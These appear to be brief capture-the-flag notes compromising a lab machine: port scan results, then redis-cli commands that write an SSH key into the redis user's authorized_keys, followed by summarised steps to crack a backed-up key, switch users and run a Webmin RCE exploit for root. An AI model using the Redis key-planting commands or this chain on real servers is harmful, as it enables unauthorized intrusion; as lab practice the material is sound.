OS:
- Linux

Open Ports:
- 22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- |   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
- |   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
- |_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
- 80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
- |_http-server-header: Apache/2.4.29 (Ubuntu)
- |_http-title: The Cyber Geek's Personal Website
- 6379/tcp  open  redis   Redis key-value store 4.0.9
- 10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
- |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1)


- running web scans
- enumerating port 6379
- nc to port, ran INFO
Version: redis_version:4.0.9
Files of interest:
- executable:/usr/bin/redis-server
- config_file:/etc/redis/redis.conf

- using redis to get ssh key planted in redis user:
generated ssh key pair
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized keys"
save

- ssh with private key as redis
- logged in as redis
- priv esc scripts
- found id_rsa backup
- cracked hash
- su to Matt
- re-running enum scripts
- tried logging into webmin with matt's creds
- authenticated
- running authenticated RCE exploit against webmin

- got root shell
